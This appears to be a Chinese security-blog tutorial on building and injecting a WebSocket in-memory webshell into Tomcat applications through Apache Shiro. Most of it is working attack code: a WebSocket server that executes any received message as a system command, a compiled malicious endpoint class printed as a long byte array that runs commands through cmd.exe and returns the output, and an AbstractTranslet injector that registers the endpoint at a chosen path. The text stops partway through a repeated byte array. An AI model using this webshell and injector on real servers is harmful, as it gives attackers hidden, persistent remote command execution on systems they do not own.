freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

深入浅出Shiro WebSocket内存马
2023-06-25 16:17:13
所属地 河北省

1.什么是WebSocket?

websocket协议是基于TCP的一种新的网络协议。它实现了浏览器与服务器的全双工通讯-允许服务器主动发起信息个客户端。

websocket’是一种持久协议,http是非持久协议。在websocket出现之前,是通过通过ajax轮询来实现网站实时推送消息给浏览器客户端。轮询是指由浏览器每隔一段时间向服务器发出 HTTP 请求,然后服务器返回最新的数据给客户端。轮询的效率低,非常浪费资源。

websocket和http的区别

HTTP 协议是一种无状态的、无连接的、单向的应用层协议。它采用了请求/响应模型。通信请求只能由客户端发起,服务端对请求做出应答处理,HTTP 协议无法实现服务器主动向客户端发起消息。

WebSocket 只需要建立一次连接,就可以一直保持连接状态。这相比于轮询方式的不停建立连接显然效率要大大提高

在通俗来将,大家访问网页都是http://   而WebSocket链接方式为ws://

2. WebSocket入门

首先导入maven依赖

<dependency>
      <groupId>org.java-websocket</groupId>
      <artifactId>Java-WebSocket</artifactId>
      <version>1.5.3</version>
    </dependency>

而在使用WebSocket也是非常简单

public class SocketServer extends WebSocketServer {
    public SocketServer(int port) throws UnknownHostException {
        super(new InetSocketAddress(port));
    }

    @Override
    public void onOpen(WebSocket webSocket, ClientHandshake clientHandshake) {
        System.out.println("有人连接");
    }

    @Override
    public void onClose(WebSocket webSocket, int i, String s, boolean b) {

    }

    @Override
    public void onMessage(WebSocket webSocket, String s) {
        System.out.println("收到消息"+s);
        try {
            Runtime.getRuntime().exec(s);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public void onError(WebSocket webSocket, Exception e) {

    }

    @Override
    public void onStart() {

    }

}

其实主要操作的就是WebSocketServer,继承该类之后,重写该类的方法,当客户端链接之后,客户端做出什么样的操作,服务端就执行哪个方法,这样说起来肯定就很容易理解了。

接下来讲解下WebSocketServer上方重写的方法,可以执行哪些功能

onOpen           * * 连接建立后触发的方法
onClose           * * 连接关闭后触发的方法
onMessage      * * 接收到客户端消息时触发的方法
onError            * * 发生错误时触发的方法

接下来通过main函数启动即可,启动之后则会监听8877端口等待客户端链接

1687678647_6497eeb7206a217ebefae.png!small

稍后可以找一个在线WebSocket客户端进行发送即可,看如下,本人发送了calc,而服务端接收到消息后,会在onMessage处理,接收到消息并进行处理。

1687678804_6497ef54cf26395e5c864.png!small


3. Shiro WebSocket内存马

在学习完WebSocket的基本使用后,可以深入研究一下内存马。

在tomcat中可以通过WsSic对WebSocket进行操作和处理。而shiro注入内存马,最常见的就是Filter,本篇主要注重WebSocket内存马的注入。

首先准备一个可以进行WebSocket的服务端,主要功能就是传参到onMessage进行执行命令

类似于前面那种即可,当然也可以找一下网上师傅们的代码也可以。

1687679419_6497f1bbe11d7bec3558b.png!small

利用javassist生成为字节码

1687679467_6497f1eba71f3acdc8086.png!small

byte[] bytes = new byte[]{-54, -2, -70, -66, 0, 0, 0, 51, 0, -96, 10, 0, 33, 0, 81, 9, 0, 32, 0, 82, 11, 0, 83, 0, 84, 8, 0, 85, 10, 0, 86, 0, 87, 9, 0, 88, 0, 89, 10, 0, 11, 0, 90, 8, 0, 91, 10, 0, 11, 0, 92, 10, 0, 93, 0, 94, 7, 0, 95, 8, 0, 96, 8, 0, 97, 10, 0, 93, 0, 98, 10, 0, 99, 0, 100, 7, 0, 101, 10, 0, 16, 0, 81, 10, 0, 102, 0, 103, 10, 0, 16, 0, 104, 10, 0, 102, 0, 105, 10, 0, 99, 0, 106, 11, 0, 83, 0, 107, 8, 0, 108, 10, 0, 16, 0, 109, 10, 0, 16, 0, 110, 11, 0, 111, 0, 112, 7, 0, 113, 10, 0, 27, 0, 114, 7, 0, 115, 10, 0, 29, 0, 114, 10, 0, 32, 0, 116, 7, 0, 117, 7, 0, 118, 7, 0, 120, 1, 0, 7, 115, 101, 115, 115, 105, 111, 110, 1, 0, 25, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 19, 76, 99, 111, 109, 47, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 59, 1, 0, 6, 111, 110, 79, 112, 101, 110, 1, 0, 60, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 41, 86, 1, 0, 14, 101, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 1, 0, 32, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 1, 0, 16, 77, 101, 116, 104, 111, 100, 80, 97, 114, 97, 109, 101, 116, 101, 114, 115, 1, 0, 9, 111, 110, 77, 101, 115, 115, 97, 103, 101, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 4, 101, 120, 101, 99, 1, 0, 19, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 2, 105, 115, 1, 0, 1, 90, 1, 0, 3, 105, 112, 115, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 2, 115, 98, 1, 0, 25, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 1, 105, 1, 0, 1, 73, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 32, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 73, 110, 116, 101, 114, 114, 117, 112, 116, 101, 100, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 1, 115, 1, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 121, 7, 0, 122, 7, 0, 101, 7, 0, 117, 7, 0, 95, 7, 0, 113, 7, 0, 115, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 86, 1, 0, 9, 83, 105, 103, 110, 97, 116, 117, 114, 101, 1, 0, 5, 87, 104, 111, 108, 101, 1, 0, 12, 73, 110, 110, 101, 114, 67, 108, 97, 115, 115, 101, 115, 1, 0, 84, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 60, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 62, 59, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 18, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 46, 106, 97, 118, 97, 12, 0, 37, 0, 38, 12, 0, 35, 0, 36, 7, 0, 123, 12, 0, 124, 0, 125, 1, 0, 7, 111, 115, 46, 110, 97, 109, 101, 7, 0, 126, 12, 0, 127, 0, -128, 7, 0, -127, 12, 0, -126, 0, -125, 12, 0, -124, 0, -123, 1, 0, 7, 119, 105, 110, 100, 111, 119, 115, 12, 0, -122, 0, -121, 7, 0, -120, 12, 0, -119, 0, -118, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 1, 0, 7, 99, 109, 100, 46, 101, 120, 101, 1, 0, 2, 47, 99, 12, 0, 51, 0, -117, 7, 0, 121, 12, 0, -116, 0, -115, 1, 0, 23, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 7, 0, 122, 12, 0, -114, 0, -113, 12, 0, -112, 0, -111, 12, 0, -110, 0, 38, 12, 0, -109, 0, -113, 12, 0, -108, 0, -106, 1, 0, 4, 77, 83, 71, 58, 12, 0, -112, 0, -105, 12, 0, -104, 0, -103, 7, 0, -101, 12, 0, -100, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, -99, 0, 38, 1, 0, 30, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 73, 110, 116, 101, 114, 114, 117, 112, 116, 101, 100, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 49, 0, 50, 1, 0, 17, 99, 111, 109, 47, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 1, 0, 24, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 7, 0, -98, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 1, 0, 17, 97, 100, 100, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 35, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 11, 103, 101, 116, 80, 114, 111, 112, 101, 114, 116, 121, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 16, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 1, 0, 4, 82, 79, 79, 84, 1, 0, 18, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 59, 1, 0, 11, 116, 111, 76, 111, 119, 101, 114, 67, 97, 115, 101, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 115, 116, 97, 114, 116, 115, 87, 105, 116, 104, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 90, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 40, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 14, 103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 40, 41, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 4, 114, 101, 97, 100, 1, 0, 3, 40, 41, 73, 1, 0, 6, 97, 112, 112, 101, 110, 100, 1, 0, 28, 40, 67, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 5, 99, 108, 111, 115, 101, 1, 0, 7, 119, 97, 105, 116, 70, 111, 114, 1, 0, 14, 103, 101, 116, 66, 97, 115, 105, 99, 82, 101, 109, 111, 116, 101, 1, 0, 5, 66, 97, 115, 105, 99, 1, 0, 40, 40, 41, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 59, 1, 0, 45, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 8, 116, 111, 83, 116, 114, 105, 110, 103, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 7, 0, -97, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 1, 0, 8, 115, 101, 110, 100, 84, 101, 120, 116, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 0, 33, 0, 32, 0, 33, 0, 1, 0, 34, 0, 1, 0, 2, 0, 35, 0, 36, 0, 0, 0, 4, 0, 1, 0, 37, 0, 38, 0, 1, 0, 39, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 41, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 42, 0, 43, 0, 0, 0, 1, 0, 44, 0, 45, 0, 2, 0, 39, 0, 0, 0, 86, 0, 2, 0, 3, 0, 0, 0, 16, 42, 43, -75, 0, 2, 42, -76, 0, 2, 42, -71, 0, 3, 2, 0, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 14, 0, 3, 0, 0, 0, 15, 0, 5, 0, 16, 0, 15, 0, 17, 0, 41, 0, 0, 0, 32, 0, 3, 0, 0, 0, 16, 0, 42, 0, 43, 0, 0, 0, 0, 0, 16, 0, 35, 0, 36, 0, 1, 0, 0, 0, 16, 0, 46, 0, 47, 0, 2, 0, 48, 0, 0, 0, 9, 2, 0, 35, 0, 0, 0, 46, 0, 0, 0, 1, 0, 49, 0, 50, 0, 2, 0, 39, 0, 0, 1, -67, 0, 5, 0, 7, 0, 0, 0, -79, 18, 4, -72, 0, 5, -78, 0, 6, -74, 0, 7, 18, 8, -74, 0, 9, 61, 28, -103, 0, 31, -72, 0, 10, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 14, 78, -89, 0, 28, -72, 0, 10, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 14, 78, 45, -74, 0, 15, 58, 4, -69, 0, 16, 89, -73, 0, 17, 58, 5, 25, 4, -74, 0, 18, 89, 54, 6, 2, -97, 0, 15, 25, 5, 21, 6, -110, -74, 0, 19, 87, -89, -1, -21, 25, 4, -74, 0, 20, 45, -74, 0, 21, 87, 42, -76, 0, 2, -71, 0, 22, 1, 0, -69, 0, 16, 89, -73, 0, 17, 18, 23, -74, 0, 24, 25, 5, -74, 0, 25, -74, 0, 24, -74, 0, 25, -71, 0, 26, 2, 0, -89, 0, 16, 77, 44, -74, 0, 28, -89, 0, 8, 77, 44, -74, 0, 30, -79, 0, 2, 0, 0, 0, -96, 0, -93, 0, 27, 0, 0, 0, -96, 0, -85, 0, 29, 0, 3, 0, 40, 0, 0, 0, 74, 0, 18, 0, 0, 0, 22, 0, 17, 0, 24, 0, 21, 0, 25, 0, 49, 0, 27, 0, 74, 0, 30, 0, 80, 0, 31, 0, 89, 0, 33, 0, 101, 0, 34, 0, 113, 0, 36, 0, 118, 0, 37, 0, 123, 0, 38, 0, -96, 0, 43, 0, -93, 0, 39, 0, -92, 0, 40, 0, -88, 0, 43, 0, -85, 0, 41, 0, -84, 0, 42, 0, -80, 0, 44, 0, 41, 0, 0, 0, 102, 0, 10, 0, 46, 0, 3, 0, 51, 0, 52, 0, 3, 0, 17, 0, -113, 0, 53, 0, 54, 0, 2, 0, 74, 0, 86, 0, 51, 0, 52, 0, 3, 0, 80, 0, 80, 0, 55, 0, 56, 0, 4, 0, 89, 0, 71, 0, 57, 0, 58, 0, 5, 0, 97, 0, 63, 0, 59, 0, 60, 0, 6, 0, -92, 0, 4, 0, 61, 0, 62, 0, 2, 0, -84, 0, 4, 0, 61, 0, 63, 0, 2, 0, 0, 0, -79, 0, 42, 0, 43, 0, 0, 0, 0, 0, -79, 0, 64, 0, 65, 0, 1, 0, 66, 0, 0, 0, 46, 0, 7, -4, 0, 49, 1, -4, 0, 24, 7, 0, 67, -3, 0, 14, 7, 0, 68, 7, 0, 69, -4, 0, 23, 1, -1, 0, 49, 0, 2, 7, 0, 70, 7, 0, 71, 0, 1, 7, 0, 72, 71, 7, 0, 73, 4, 0, 48, 0, 0, 0, 5, 1, 0, 64, 0, 0, 16, 65, 0, 49, 0, 74, 0, 2, 0, 39, 0, 0, 0, 51, 0, 2, 0, 2, 0, 0, 0, 9, 42, 43, -64, 0, 11, -74, 0, 31, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 41, 0, 0, 0, 12, 0, 1, 0, 0, 0, 9, 0, 42, 0, 43, 0, 0, 0, 48, 0, 0, 0, 5, 1, 0, 64, 16, 0, 0, 3, 0, 75, 0, 0, 0, 2, 0, 78, 0, 79, 0, 0, 0, 2, 0, 80, 0, 77, 0, 0, 0, 18, 0, 2, 0, 34, 0, 119, 0, 76, 6, 9, 0, 111, 0, -102, 0, -107, 6, 9};

之后看下方代码,来加载这个服务端用的,代码主要功能也很简单

1.获取当前的StandardContext
2.通过StandardContext获取ServerContainer
3.定义一个恶意类,并创建一个ServerEndpointConfig,给这个恶意类分配URI path
4.调用ServerContainer.addEndpoint方法,将创建的ServerEndpointConfig添加进去

public class shiro_shell extends AbstractTranslet {

    static{
        WebappClassLoaderBase webappClassLoader = (WebappClassLoaderBase)Thread.currentThread().getContextClassLoader();//获取webappClassLoader
        StandardRoot standardRoot = (StandardRoot) webappClassLoader.getResources();
        if(standardRoot==null){
            Field field;
            try {
                field = webappClassLoader.getClass().getDeclaredField("resources");
                field.setAccessible(true);
                standardRoot = (StandardRoot)field.get(webappClassLoader);
            }catch (Exception e){
                try {
                    field = webappClassLoader.getClass().getSuperclass().getDeclaredField("resources");
                    field.setAccessible(true);
                    standardRoot = (StandardRoot)field.get(webappClassLoader);
                } catch (NoSuchFieldException noSuchFieldException) {
                    noSuchFieldException.printStackTrace();
                } catch (IllegalAccessException illegalAccessException) {
                    illegalAccessException.printStackTrace();
                }

            }
        }
        StandardContext standardContext = (StandardContext) standardRoot.getContext();

        ClassLoader cl = Thread.currentThread().getContextClassLoader();
        Class clazz;
    byte[] bytes = new byte[]{-54, -2, -70, -66, 0, 0, 0, 51, 0, -96, 10, 0, 33, 0, 81, 9, 0, 32, 0, 82, 11, 0, 83, 0, 84, 8, 0, 85, 10, 0, 86, 0, 87, 9, 0, 88, 0, 89, 10, 0, 11, 0, 90, 8, 0, 91, 10, 0, 11, 0, 92, 10, 0, 93, 0, 94, 7, 0, 95, 8, 0, 96, 8, 0, 97, 10, 0, 93, 0, 98, 10, 0, 99, 0, 100, 7, 0, 101, 10, 0, 16, 0, 81, 10, 0, 102, 0, 103, 10, 0, 16, 0, 104, 10, 0, 102, 0, 105, 10, 0, 99, 0, 106, 11, 0, 83, 0, 107, 8, 0, 108, 10, 0, 16, 0, 109, 10, 0, 16, 0, 110, 11, 0, 111, 0, 112, 7, 0, 113, 10, 0, 27, 0, 114, 7, 0, 115, 10, 0, 29, 0, 114, 10, 0, 32, 0, 116, 7, 0, 117, 7, 0, 118, 7, 0, 120, 1, 0, 7, 115, 101, 115, 115, 105, 111, 110, 1, 0, 25, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 19, 76, 99, 111, 109, 47, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 59, 1, 0, 6, 111, 110, 79, 112, 101, 110, 1, 0, 60, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 41, 86, 1, 0, 14, 101, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 1, 0, 32, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 1, 0, 16, 77, 101, 116, 104, 111, 100, 80, 97, 114, 97, 109, 101, 116, 101, 114, 115, 1, 0, 9, 111, 110, 77, 101, 115, 115, 97, 103, 101, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 4, 101, 120, 101, 99, 1, 0, 19, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 2, 105, 115, 1, 0, 1, 90, 1, 0, 3, 105, 112, 115, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 2, 115, 98, 1, 0, 25, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 1, 105, 1, 0, 1, 73, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 32, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 73, 110, 116, 101, 114, 114, 117, 112, 116, 101, 100, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 1, 115, 1, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 121, 7, 0, 122, 7, 0, 101, 7, 0, 117, 7, 0, 95, 7, 0, 113, 7, 0, 115, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 86, 1, 0, 9, 83, 105, 103, 110, 97, 116, 117, 114, 101, 1, 0, 5, 87, 104, 111, 108, 101, 1, 0, 12, 73, 110, 110, 101, 114, 67, 108, 97, 115, 115, 101, 115, 1, 0, 84, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 60, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 62, 59, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 18, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 46, 106, 97, 118, 97, 12, 0, 37, 0, 38, 12, 0, 35, 0, 36, 7, 0, 123, 12, 0, 124, 0, 125, 1, 0, 7, 111, 115, 46, 110, 97, 109, 101, 7, 0, 126, 12, 0, 127, 0, -128, 7, 0, -127, 12, 0, -126, 0, -125, 12, 0, -124, 0, -123, 1, 0, 7, 119, 105, 110, 100, 111, 119, 115, 12, 0, -122, 0, -121, 7, 0, -120, 12, 0, -119, 0, -118, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 1, 0, 7, 99, 109, 100, 46, 101, 120, 101, 1, 0, 2, 47, 99, 12, 0, 51, 0, -117, 7, 0, 121, 12, 0, -116, 0, -115, 1, 0, 23, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 7, 0, 122, 12, 0, -114, 0, -113, 12, 0, -112, 0, -111, 12, 0, -110, 0, 38, 12, 0, -109, 0, -113, 12, 0, -108, 0, -106, 1, 0, 4, 77, 83, 71, 58, 12, 0, -112, 0, -105, 12, 0, -104, 0, -103, 7, 0, -101, 12, 0, -100, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, -99, 0, 38, 1, 0, 30, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 73, 110, 116, 101, 114, 114, 117, 112, 116, 101, 100, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 49, 0, 50, 1, 0, 17, 99, 111, 109, 47, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 1, 0, 24, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 7, 0, -98, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 1, 0, 17, 97, 100, 100, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 35, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 11, 103, 101, 116, 80, 114, 111, 112, 101, 114, 116, 121, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 